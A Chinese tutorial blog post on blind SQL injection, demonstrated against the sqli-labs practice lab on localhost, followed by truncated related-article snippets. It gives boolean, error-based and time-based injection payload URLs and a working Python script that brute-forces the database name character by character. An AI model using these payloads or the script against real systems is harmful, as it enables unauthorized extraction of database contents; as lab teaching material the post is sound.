2. 程式人生 > >SQL盲注注入——布林型

SQL盲注注入——布林型

阿新 發佈:2019-02-15

盲注是注入的一種,指的是在不知道資料庫返回值的情況下對資料中的內容進行猜測,實施SQL注入。盲注一般分為布林盲注和基於時間的盲注和報錯的盲注。本次主要講解的是基於布林的盲注。

Length()函式 返回字串的長度
Substr()擷取字串
Ascii()返回字元的ascii碼
sleep(n):將程式掛起一段時間 n為n秒
if(expr1,expr2,expr3):判斷語句 如果第一個語句正確就執行第二個語句如果錯誤執行第三個語句

當然如果上面的函式被禁用,也有相應的函式替換。可百度

布林型:頁面只返回True和False兩種型別頁面。利用頁面返回不同,逐個猜解資料

http://127.0.0.1/Less-8/?id=1'and (length(database()))>10 --+

當前資料庫database()的長度大於10,返回true頁面,否則FALSE頁面

報錯型:構造payload讓資訊通過錯誤提示回顯出來,一種型別(其它的暫時不怎麼了解)是先報欄位數,再利用後臺資料庫報錯機制回顯(跟一般的報錯區別是,一般的報錯注入是爆出欄位數後,在此基礎通過正確的查詢語句,使結果回顯到頁面;後者是在爆出欄位數的基礎上使用能觸發SQL報錯機制的注入語句)

列如典型payload:

Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a;

count(*)計數   concat()連線字元   floor()重複資料,返回0,1兩個值  group by 進行分組 rand(0)避免資料重複造成的錯誤

時間型:通過頁面沉睡時間判斷

通過 sleep()函式測試,通過if()和sleep()聯合逐個猜解資料

http://127.0.0.1/Less-9/?id=1' and (if(ascii(substr(database(),1,1))>100,sleep(10),sleep(4))  --+

如果當前查詢的當前資料庫ascii(substr(database()),1,1)的第一個字元的ASCII碼大於100,ture 沉睡10秒,FALSE 沉睡4秒

布林型詳解:

 測試頁面:

get一個引數 id =1,返回TRUE頁面

注入測試加單引號id=1',返回不正確頁面。

到這裡初步確定單引號存在注入,TRUE頁面有’you are in...........‘,FALSE頁面不存在’you are in ........‘

 原始碼:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";驗證確實是由於單引號閉合導致注入漏洞。後臺執行結果SELECT * FROM users WHERE id='1’' 原因單引號在閉合後還存在一個單引號。會引起查詢報錯

知道為盲注布林型注入,利用上面的函式進行猜解

猜當前資料庫第一個字元:(下面程式碼還需進行編碼)

http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1'and ascii(substr(database(),1,1))>114#

利用二分法,115為fal,114TRUE,資料庫第一個字元ASCII為115,即s

同理修改substr(database(),2,1)可猜第二個字元,之後同理,當然在猜資料庫字元前也可先猜資料庫長度:length(database())

http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1' and ascii(substr(database(),1,1))>114# 這條語句在後臺為:

SELECT * FROM users WHERE id='1' and ascii(substr(database(),1,1))>114#'(後面單引號被#註釋掉)

後面的表,列,欄位猜解在上篇有介紹查詢語句

如表

http://127.0.0.1/Less-8/index.php?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>100#

其它就不一一寫了。

接下來是自己寫的Python指令碼,爆破資料庫長度和資料庫

import requests
def database_len():
	for i in range(1,10):
		url = '''http://127.0.0.1/sqli-labs-master/Less-8/index.php'''
		payload = '''?id=1' and length(database())>%s''' %i
		# print(url+payload+'%23')
		r = requests.get(url+payload+'%23')
		if 'You are in' in r.text:
			print(i)

		else:
			#print('false')
			print('database_length:',i)
			break
database_len()

def database_name():
	name = ''
	for j in range(1,9):
		for i in 'sqcwertyuioplkjhgfdazxvbnm':
			url = "http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1' and substr(database(),%d,1)='%s'" %(j,i)
			# print(url+'%23')
			r = requests.get(url+'%23')
			if 'You are in' in r.text:
				name = name+i
				
				print(name)
				
				break
	print('database_name:',name)
	
		
	
database_name()

表,欄位,改下payload就可以跑了。

相關推薦

SQL注入——布林

盲注是注入的一種,指的是在不知道資料庫返回值的情況下對資料中的內容進行猜測,實施SQL注入。盲注一般分為布林盲注和基於時間的盲注和報錯的盲注。本次主要講解的是基於布林的盲注。 Length()函式 返回字串的長度 Substr()擷取字串 Ascii()返回字元的ascii

Sql與普通注入的區別

          在學習sql注入的時候,好多同學都是不弄清楚原理,去瀏覽器上狂搜一下注入語句,就開始對老師給的靶機注入,雖然能注入成功,但是不清楚原理,對以後的學習和工作沒有多大的好處。現在我就講一下sql盲注與普通注入的區別! (adsbygoogle = window.ads

CTF中幾種通用的sql手法和注入的一些tips

0x00 前言 在ctf比賽中難免會遇到一些比較有(keng)趣(die)的注入題,需要我們一步步的繞過waf和過濾規則,這種情況下大多數的注入方法都是盲注。然而在盲注過程中由於這些過濾規則不太好繞過,這時候就會無從下手,下面分享一下自己在比賽中總結幾種比較通用的盲注手

滲透測試之POC基於布林sql

基於布林的盲注一般只能告訴我們true or fasle。 就比如你只能向系統提問,但是系統只能回答你是或者不是。 一般套路是先問資料庫名字有多長,1,2,3,4直到回答出是,然後獲取到資料庫名字長度,然後資料庫第一個字元是不是a,b,c,d....直到回答是,獲取第一個字

SQL SQL 注入、跨站點指令碼編制可能解決方案

跨站       3.點指令碼編制 詳細資訊 有多種減輕威脅的技巧: [1] 策略:庫或框架 使用不允許此弱點出現的經過稽核的庫或框架,或提供更容易避免此弱點的構造。 可用於更輕鬆生成正確編碼的輸出的庫和框架示例包括 Microsoft 的 Anti-XSS 庫、OWA

第九屆極客大挑戰——Geek Chatroom(sql

引言:因為太想加入三葉草了,所以極客大挑戰這段時間一直在努力的學習,原來還真沒想到能在比賽中拿到排行榜第一的成績,不過現在看來努力始終都是有回報的。但我依然還是比較菜啊-.-,最近卻有很多夥伴加我好友,一來就叫我大佬,讓我深感有愧-.-,既然都想看我wp,那我就挑幾道題寫寫好了,口拙詞劣還望見諒。

SQL(1)

簡介 Web應用訪問資料庫的目的有很多。常見目的就是訪問資料並呈現給使用者。在這種情況下,攻擊者就有可能會修改SQL語句並顯示資料庫中的任意資訊,並將這些資訊寫入到Web伺服器對HTTP請求的響應之中。有時不顯示資料庫的資訊,但並不表示程式碼不會受到SQL注入攻擊。 列如,使用者輸入任意使用者名稱及密碼時

SQL(2)

時間延遲 測試SQL注入漏洞時,會發現某一潛在漏洞難以確定,主要原因是Web應用沒有顯示任何錯誤,因而無法檢索任何資料。這種情況下,可以考慮向資料庫注入時間延遲。MSSQL伺服器有一條內建命令waitfor delay 'hours:minutes:seconds' http://127.0.0.1

sql 之利用regexp得到庫名,表名,列名

我們都已經知道,在MYSQL 5+中 information_schema庫中儲存了所有的 庫名,表明以及欄位名資訊。故攻擊方式如下: 1. 判斷第一個表名的第一個字元是否是a-z中的字元,其中blind_sqli是假設已知的庫名。 注:正則表示式中 ^[a-z] 表示字

sql學習

information_schema.schemata(schema_name) information_schema.tables(table_name,table_schema) information_schema.columns(column_name,table_name) 盲注與poc編寫:ht

WEB手動漏洞挖掘-SQL(DVWA實戰)

select * from table_name where id = ’ 1’ and 1=1– ’ 在盲注裡至少要有一個正確的結果;否則不顯示; 1'order

sql注入基於布林/時間的詳解

                本來想自己總結寫一篇的,發現有篇寫的很好,轉載mark一個~原文連結:http://www.jb51.net/article/93445.htm基於布林的盲注Web的頁面的僅僅會返回True和False。那麼布林盲注就是進行SQL注入之後然後根據頁面返回的True或者是Fals

【20】WEB安全學習----MySQL注入-5(布林)

布林型盲注例子演示: 本次程式碼不輸出具體的查詢記錄結果,如果存在ID值則輸出一個狀態,不存在ID值則輸出另一個狀態,也不會輸出SQL報錯狀態,為布林型盲注。 <?php header('content-type:text/html;charset=utf-

SQL注入優化

SQL注入之盲注優化技術 典型時間型盲注示例程式碼: <?php header('content-type:text/html;charset=utf-8'); @$id=$_GET['id']; //傳參 if(!isset($id)){

SQL注入技巧拓展】————5、MySQL淺析

前言 所有的測試均為無WAF的情況下進行。 註釋關鍵字 -- # 單行註釋,兩個-連線符後面緊跟著一個空格 # # 單行註釋 /**/ # 多行註釋 實踐效果: mysql> SELECT username,password FR

暑期練習web23:sqli lab第五關 雙注入GET單引號字元注入----基於bool的手工

如果所查詢的使用者id在資料庫中,可以發現頁面顯示”You are in”,而不像前4關那樣會顯示出具體的賬號密碼 而如果輸入的查詢語句不存在,則什麼也不會返回 這裡普及一下盲注時的常用函式 1.mid()函式 mid(striing,start

SQL注入筆記03:攻擊

普通聯合注入和盲注的區別 普通注入:效率高,相容性差 盲注:效率低,相容性強 工具採用的基本都為盲注及其他注入 ********************************************************基於時間延遲的盲注攻擊:***********

sqli-labs—————Sql注入講解

盲注何為盲注?盲注就是在sql注入過程中,sql語句執行的選擇後,選擇的資料不能回顯到前端頁面。此時,我們需要利用一些方法進行判斷或者嘗試,這個過程稱之為盲注。盲注分為三類•基於布林SQL盲注•基於時間的SQL盲注•基於報錯的SQL盲注1、基於布林SQL盲注————構造邏輯判

Sql注入系列詳解(一)---基於時間差的

Sql 基於時間的盲注 基於的原理是,當對資料庫進行查詢操作,如果查詢的條件不存在,語句執行的時間便是0.但往往語句執行的速度非常快,執行緒資訊一閃而過,得到的執行時間基本為0. 例如: 於是sleep(N)這個語句在這種情況下起到了非常大的作用。  Select s

SQL注入總彙

最近看了一些盲注習題,在這裡想總結一下吧。 盲注其實可以代替任何注入,但基本的注入比盲注簡單。在這裡我先解析幾道盲注的習題。 1. JSOJ的題目 發現了sql盲注漏洞 並且是slee